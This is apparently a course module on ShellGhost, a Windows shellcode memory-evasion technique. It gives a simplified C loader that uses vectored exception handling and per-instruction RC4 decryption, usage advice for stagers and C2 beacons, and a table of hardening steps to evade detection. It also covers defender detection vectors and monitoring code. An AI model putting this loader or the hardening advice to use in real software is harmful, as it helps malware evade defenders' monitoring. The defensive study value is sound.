Module 8: Full Chain, Performance & Detection
The complete execution flow, real-world performance implications, detection vectors, and how ShellGhost compares to other memory evasion techniques.
Module Objective
This final module consolidates the course into an end-to-end walkthrough of ShellGhost, analyzes the performance overhead of per-instruction exception handling, catalogs the detection vectors defenders can use to identify it, and compares it against alternative memory evasion techniques such as sleep encryption and module stomping. You will leave with a clear picture of ShellGhost's strengths, limitations, and place in the offensive tooling landscape.
1. Complete Execution Flow
Here is the complete ShellGhost chain from program start to shellcode completion, combining every concept from the previous seven modules:
ShellGhost End-to-End Pipeline
[Diagram: mapping.py preprocessing → encrypted data + map → buffer filled with 0xCC → VEH registered (First = 1) → thread entry at .text end → per-instruction handling → cleanup (remove VEH, free)]
// Complete ShellGhost implementation (simplified, shows architecture)
#include <windows.h>
#include <string.h>
// ============ Types ============
typedef struct _CRYPT_BYTES_QUOTA {
DWORD rva;
DWORD quota;
} CRYPT_BYTES_QUOTA;
typedef NTSTATUS (WINAPI *_SystemFunction032)(
PUNICODE_STRING, PUNICODE_STRING);
// ============ Global State ============
static struct {
PBYTE exec_base;
SIZE_T exec_size;
PBYTE enc_sc; // Pre-encrypted shellcode (from mapping.py)
SIZE_T sc_size;
CRYPT_BYTES_QUOTA *map;
DWORD num_instr;
DWORD current_index;
INT prev_index;
BYTE key[16];
USHORT key_len;
_SystemFunction032 pSF032;
} G;
// ============ VEH Handler ============
LONG CALLBACK Handler(PEXCEPTION_POINTERS ep) {
PEXCEPTION_RECORD r = ep->ExceptionRecord;
PCONTEXT c = ep->ContextRecord;
DWORD old;
if (r->ExceptionCode == EXCEPTION_BREAKPOINT) {
// Rip already adjusted by kernel (no -1 needed)
PBYTE addr = (PBYTE)c->Rip;
if (addr < G.exec_base ||
addr >= G.exec_base + G.exec_size)
return EXCEPTION_CONTINUE_SEARCH;
// Toggle to RW for writing
VirtualProtect(G.exec_base, G.exec_size,
PAGE_READWRITE, &old);
// Re-mask previous instruction: overwrite its plaintext with 0xCC
// (the encrypted copy stays untouched in G.enc_sc)
if (G.prev_index >= 0) {
CRYPT_BYTES_QUOTA *prev = &G.map[G.prev_index];
memset(G.exec_base + prev->rva, 0xCC, prev->quota);
}
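// Decrypt current instruction via SystemFunction032
// (simplified: the index advances sequentially, which only matches
// straight-line code; it does not follow branches)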
CRYPT_BYTES_QUOTA *curr = &G.map[G.current_index];
memcpy(G.exec_base + curr->rva,
G.enc_sc + curr->rva, curr->quota);
UNICODE_STRING data = {
(USHORT)curr->quota, (USHORT)curr->quota,
(PWSTR)(G.exec_base + curr->rva) };
UNICODE_STRING key = {
G.key_len, G.key_len, (PWSTR)G.key };
G.pSF032(&data, &key);
// Toggle to RX for execution
VirtualProtect(G.exec_base, G.exec_size,
PAGE_EXECUTE_READ, &old);
G.prev_index = G.current_index;
G.current_index++;
return EXCEPTION_CONTINUE_EXECUTION;
}
return EXCEPTION_CONTINUE_SEARCH;
}
// ============ Main ============
void ShellGhostRun(
PBYTE enc_sc, SIZE_T sc_size, // From mapping.py
CRYPT_BYTES_QUOTA *map, DWORD n_instr,
PBYTE key, USHORT key_len
) {
// 1. Store references
G.enc_sc = enc_sc;
G.sc_size = sc_size;
G.map = map;
G.num_instr = n_instr;
memcpy(G.key, key, key_len);
G.key_len = key_len;
G.prev_index = -1;
G.current_index = 0;
// 2. Resolve SystemFunction032
G.pSF032 = (_SystemFunction032)GetProcAddress(
LoadLibraryA("advapi32.dll"), "SystemFunction032");
// 3. Allocate RW buffer filled with 0xCC
G.exec_base = (PBYTE)VirtualAlloc(NULL, sc_size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(G.exec_base, 0xCC, sc_size);
G.exec_size = sc_size;
// 4. Register VEH handler
PVOID h = AddVectoredExceptionHandler(1, Handler);
// 5. Create thread at end of .text segment
LPVOID entry = ResolveEndofTextSegment();
HANDLE hThread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
// 6. Cleanup
RemoveVectoredExceptionHandler(h);
VirtualFree(G.exec_base, 0, MEM_RELEASE);
}
2. Performance Impact Analysis
ShellGhost's per-instruction exception model introduces significant overhead compared to native execution. Understanding the performance cost is essential for assessing when this technique is practical.
Exception Overhead Breakdown
| Operation | Approximate Cost | Frequency |
|---|---|---|
| Kernel trap (INT3) | ~1,000-5,000 cycles | Once per instruction |
| Context save to KTRAP_FRAME | ~500-1,000 cycles | Once per instruction |
| User-mode dispatch (KiUserExceptionDispatcher) | ~2,000-5,000 cycles | Once per instruction |
| VEH handler lookup + call | ~100-500 cycles | Once per instruction |
| SystemFunction032 decrypt | ~50-200 cycles | Once per instruction |
| VirtualProtect RW↔RX toggle | ~1,000-3,000 cycles | Twice per instruction (RX→RW, then RW→RX) |
| Memory write (re-encrypt + decrypt) | ~10-100 cycles | Once per instruction |
| NtContinue (restore CONTEXT) | ~2,000-5,000 cycles | Once per instruction |
Total overhead per shellcode instruction: approximately 7,000 to 20,000 CPU cycles (summing the rows above, with VirtualProtect counted twice, gives about 7,700 at the low end and 22,800 at the high end). A typical instruction executes in 1-5 cycles natively, so ShellGhost imposes a slowdown of roughly 1,500x to 20,000x. The one-exception model (breakpoint only, no single-step) incurs approximately half the exception overhead of a two-exception approach.
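The per-instruction total can be checked by summing the table rows mechanically. The sketch below is only a calculator for the approximate figures in the table. The struct and function names are illustrative and not part of ShellGhost.

```c
#include <assert.h>
#include <stddef.h>

/* One row of the overhead table: cost range in cycles and how many
   times the operation occurs per shellcode instruction. */
typedef struct {
    const char *name;
    unsigned lo_cycles;
    unsigned hi_cycles;
    unsigned per_instr;
} overhead_row;

static const overhead_row ROWS[] = {
    {"Kernel trap (INT3)",        1000, 5000, 1},
    {"Context save",               500, 1000, 1},
    {"User-mode dispatch",        2000, 5000, 1},
    {"VEH lookup + call",          100,  500, 1},
    {"SystemFunction032 decrypt",   50,  200, 1},
    {"VirtualProtect toggle",     1000, 3000, 2},  /* RX->RW and RW->RX */
    {"Memory write",                10,  100, 1},
    {"NtContinue",                2000, 5000, 1},
};

/* Sum the low (use_high == 0) or high estimates across all rows. */
unsigned total_cycles(int use_high) {
    unsigned sum = 0;
    for (size_t i = 0; i < sizeof ROWS / sizeof ROWS[0]; i++) {
        unsigned c = use_high ? ROWS[i].hi_cycles : ROWS[i].lo_cycles;
        sum += c * ROWS[i].per_instr;
    }
    return sum;
}

/* Slowdown relative to an instruction costing native_cycles natively. */
unsigned slowdown(unsigned overhead_cycles, unsigned native_cycles) {
    assert(native_cycles > 0);
    return overhead_cycles / native_cycles;
}
```

With these inputs, `total_cycles(0)` is 7,660 and `total_cycles(1)` is 22,800. Dividing by 5 and 1 native cycles respectively gives a range of about 1,500x to 22,800x, which matches the rounded figures quoted in the text.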
Practical Impact
| Shellcode Type | Native Execution | ShellGhost Execution | Verdict |
|---|---|---|---|
| Stager (small, network setup) | <1 ms | ~50-200 ms | Acceptable for a stager payload |
| Stageless beacon (~200KB) | ~1 ms | ~5-30 seconds for initial setup | Noticeable delay but usually tolerable |
| Continuous C2 loop | Real-time | Significant latency per iteration | ShellGhost is best for initialization, not continuous operation |
| Compute-heavy shellcode | Varies | Extremely slow | Not suitable for compute-bound payloads |
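The wall-clock figures in the table follow from the number of instructions actually executed, the per-instruction overhead, and the clock rate. A minimal sketch of that conversion is shown below. The function name, the 3 GHz clock, and the instruction counts in the usage note are assumptions chosen for illustration, not measurements.

```c
#include <assert.h>

/* Estimated run time in milliseconds for `executed` dynamically executed
   instructions, each costing `cycles_per_instr` cycles of exception
   handling overhead, on a core running at `clock_mhz` MHz. */
double shellghost_ms(unsigned long long executed,
                     unsigned cycles_per_instr,
                     unsigned clock_mhz) {
    assert(clock_mhz > 0);
    /* A core at N MHz executes N * 1000 cycles per millisecond. */
    return (double)executed * cycles_per_instr / ((double)clock_mhz * 1000.0);
}
```

For example, 20,000 executed instructions at 7,500 cycles each on an assumed 3,000 MHz core come to 50 ms, and 30,000 instructions at 20,000 cycles each come to 200 ms, which brackets the stager row above.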
Mitigation: Hybrid Approach
ShellGhost is most effective as a stager or initialization mechanism. The shellcode executed under ShellGhost's protection performs the minimum necessary work (resolve APIs, establish initial C2 connection, allocate new memory) and then copies a second-stage payload to a new region for native-speed execution. This way, the most sensitive phase (initial beacon setup, which is the most likely time for a memory scan) is protected, while long-running operations execute at normal speed.
3. Detection Vectors
While ShellGhost defeats memory signature scanning, it introduces several behavioral indicators that defenders can detect:
| Detection Vector | Observable Indicator | Detection Method | Difficulty |
|---|---|---|---|
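| VEH Registration | AddVectoredExceptionHandler API call | User-mode API hook on AddVectoredExceptionHandler (ntdll!RtlAddVectoredExceptionHandler); registration is a user-mode operation, so it is not expected to appear in kernel ETW telemetry | Easy |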
| Excessive Exceptions | Thousands of EXCEPTION_BREAKPOINT per second | Performance counters, ETW exception events, kernel callbacks | Medium |
| RW/RX Memory Toggling | Frequent VirtualProtect calls toggling between PAGE_READWRITE and PAGE_EXECUTE_READ | API hook on VirtualProtect, ETW memory protection events | Medium |
| 0xCC-Filled Memory | A memory region containing almost entirely 0xCC bytes | Heuristic scan for homogeneous INT3 regions | Medium |
| VEH Handler List Inspection | Non-standard VEH handlers registered in the process | Walking ntdll!LdrpVectorHandlerList | Medium |
| Thread Entry Point | Thread with entry point in the .text segment (at null bytes near the end) | Thread creation monitoring, unusual start address analysis | Hard |
| KiUserExceptionDispatcher Frequency | Extremely high rate of user-mode exception dispatch | Hooking KiUserExceptionDispatcher or monitoring debug events | Medium |
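From the defender's side, the 0xCC-filled memory heuristic in the table can be sketched as a simple byte-ratio check over a region that has already been read out of the target process. The function names, the minimum length, and the threshold are assumptions for illustration. Because compilers commonly pad between functions in image-backed code with INT3 bytes, a check like this is best limited to private committed regions.

```c
#include <assert.h>
#include <stddef.h>

/* Fraction (0.0 to 1.0) of bytes in buf that equal 0xCC (INT3). */
double int3_ratio(const unsigned char *buf, size_t len) {
    assert(buf != NULL || len == 0);
    if (len == 0)
        return 0.0;
    size_t hits = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0xCC)
            hits++;
    }
    return (double)hits / (double)len;
}

/* Flag a region that is large enough to matter and almost entirely INT3.
   min_len and threshold are tuning knobs, not established constants. */
int looks_int3_filled(const unsigned char *buf, size_t len,
                      size_t min_len, double threshold) {
    return len >= min_len && int3_ratio(buf, len) >= threshold;
}
```

A 256-byte region holding one short decrypted instruction and 0xCC everywhere else scores about 0.99, so a threshold near 0.95 still flags it while tolerating the single live instruction.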
4. Detection Deep Dive: VEH Registration Monitoring
// Defender perspective: detecting VEH handler registration
// Method 1: Hook AddVectoredExceptionHandler
// LogEvent and AlertEvent stand in for the sensor's own logging routines.
typedef PVOID (WINAPI *pAddVEH)(ULONG, PVECTORED_EXCEPTION_HANDLER);
pAddVEH OriginalAddVEH;  // Filled in by the hooking framework at install time
PVOID WINAPI HookedAddVEH(ULONG First, PVECTORED_EXCEPTION_HANDLER Handler) {
    // Log the registration
    LogEvent("VEH handler registered: First=%lu, Handler=%p", First, (PVOID)Handler);
    // Check whether the handler address lies in a suspicious region.
    // VirtualQuery returns 0 on failure, in which case mbi is not valid.
    MEMORY_BASIC_INFORMATION mbi;
    if (VirtualQuery((LPCVOID)Handler, &mbi, sizeof(mbi)) != 0 &&
        mbi.Type == MEM_PRIVATE && mbi.State == MEM_COMMIT) {
        AlertEvent("VEH handler in private memory (potential shellcode)");
    }
    // Note: a handler compiled into the loader image (as in the ShellGhost
    // code above) is MEM_IMAGE and will not trip this check; the
    // registration log itself is still useful.
    return OriginalAddVEH(First, Handler);
}
// Method 2: Walk the VEH handler list directly
// (requires knowledge of ntdll internal structures)
// The handler list is at ntdll!LdrpVectorHandlerList
5. Detection Deep Dive: Exception Rate Monitoring
// Defender perspective: detecting excessive exception rates
// Normal process: 0-10 exceptions per second
// ShellGhost process: 10,000-100,000+ exceptions per second
// Possible telemetry sources: a hook on ntdll!KiUserExceptionDispatcher,
// or exception events from an EDR or kernel sensor
// Note: Microsoft-Windows-Kernel-Audit-API-Calls audits a small set of
// kernel API calls and is not known to report exception dispatch, so
// verify the provider and event IDs before relying on it
// Threshold: Alert if > 1000 exceptions/second sustained
Exception Rate as an IoC
A normal Windows process generates very few exceptions during regular operation. ShellGhost generates one EXCEPTION_BREAKPOINT for every shellcode instruction it executes, and a typical payload might execute tens of thousands of instructions during initialization alone. The resulting exception rate is orders of magnitude above normal, which makes it a strong Indicator of Compromise (IoC) for behavioral detection. ShellGhost's one-exception model generates half as many exceptions as a two-exception (breakpoint + single-step) approach, but this is still far above baseline.
6. Comparison with Other Memory Evasion Techniques
| Technique | Decryption Surface | Performance | Detection Difficulty | Complexity |
|---|---|---|---|---|
| Sleep Encryption (Ekko) | Full payload during active phase | Minimal (native speed when active) | Medium (timer objects, VirtualProtect pattern) | Medium |
| Foliage | Full payload during active phase | Minimal (APC-based timer) | Medium (APC queue monitoring) | Medium-High |
| Module Stomping | Full payload (but appears backed by DLL) | Native speed | Medium (.text section hash mismatch) | Low-Medium |
| Page Guard Toggling | One page (4KB) | Moderate (one exception per page) | Medium (VirtualProtect frequency) | Medium |
| ShellGhost | 1 instruction (~1-15 bytes) | Very slow (1 exception + 2 VirtualProtect per instruction) | Medium (exception rate, VEH registration, RW/RX toggling) | High |
When to Use ShellGhost
- Ideal: When memory scanning is the primary detection concern and the shellcode is small (stagers, position-independent loaders)
- Good: As an initialization mechanism that transitions to native execution after setup
- Acceptable: When performance is not critical and stealth against memory forensics is paramount
- Not ideal: For large payloads, compute-intensive operations, or environments with strong behavioral monitoring
7. Hardening ShellGhost
Several modifications can make ShellGhost more resistant to the detection vectors identified above:
Reducing Observable Indicators
| Detection Vector | Hardening Approach |
|---|---|
| RW/RX toggling frequency | ShellGhost already avoids RWX by toggling between RW and RX. To reduce VirtualProtect call frequency, batch multiple instructions between toggles (increases decryption surface but reduces overhead). |
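| VEH registration | Direct syscalls do not apply here: there is no NtAddVectoredExceptionHandler system call. AddVectoredExceptionHandler resolves to ntdll!RtlAddVectoredExceptionHandler, which runs entirely in user mode, so a hook on that routine or an inspection of the handler list still observes the registration. |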
| 0xCC-filled region | Fill unused bytes with random data instead of uniform 0xCC. Use a different single-byte trap instruction. |
| Exception rate | Add artificial delays between instructions to reduce exception frequency (further reduces performance) |
| VEH list inspection | Encode the handler pointer manually using the same scheme as RtlEncodePointer |
8. Course Summary
What You Have Learned
| Module | Topic | Key Concept |
|---|---|---|
| 1 | Memory Scanner Evasion | Full decryption creates a detectable window; minimal decryption surface is the goal |
| 2 | Software Breakpoints | INT3 (0xCC) is a 1-byte instruction that generates EXCEPTION_BREAKPOINT (0x80000003) |
| 3 | Vectored Exception Handling | VEH handlers run before SEH; AddVectoredExceptionHandler with First=1 gives highest priority |
| 4 | The ShellGhost Concept | One-exception cycle: each BREAKPOINT handler re-encrypts previous instruction AND decrypts current one |
| 5 | SystemFunction032 & Shellcode Mapping | Python preprocessing generates CRYPT_BYTES_QUOTA maps; SystemFunction032 provides per-instruction RC4 |
| 6 | VEH Handler Implementation | ContextRecord->Rip used directly (kernel-adjusted); RW/RX toggling via VirtualProtect |
| 7 | Background: Trap Flag & Single-Stepping | General x86 knowledge about TF/EXCEPTION_SINGLE_STEP (not used by ShellGhost) |
| 8 | Full Chain & Detection | ~1,500-20,000x slowdown; detectable via VEH registration, exception rate, RW/RX toggling |
The Core Innovation
ShellGhost's innovation is twofold: (1) the shellcode mapping preprocessing pipeline that disassembles shellcode and enables per-instruction independent encryption via SystemFunction032, and (2) the realization that a one-exception cycle using only EXCEPTION_BREAKPOINT (no trap flag) is sufficient for decrypt-execute-reencrypt semantics. Combined with RW/RX memory toggling and thread creation at the .text segment end, lem0nSec created a technique that leaves at most one decrypted instruction in memory at a time, which makes the shellcode very hard for signature-based memory scanners to match, while avoiding common IoCs like RWX memory and thread entry in private memory. The cost is the slowdown and the behavioral indicators covered in this module. The trade-off is compelling where stealth matters more than performance, particularly for initial-stage execution.
Knowledge Check
Q1: What is the approximate performance overhead of ShellGhost compared to native shellcode execution?
Q2: Which detection vector is most straightforward for defenders to monitor?
Q3: What is the recommended use case for ShellGhost in a real operation?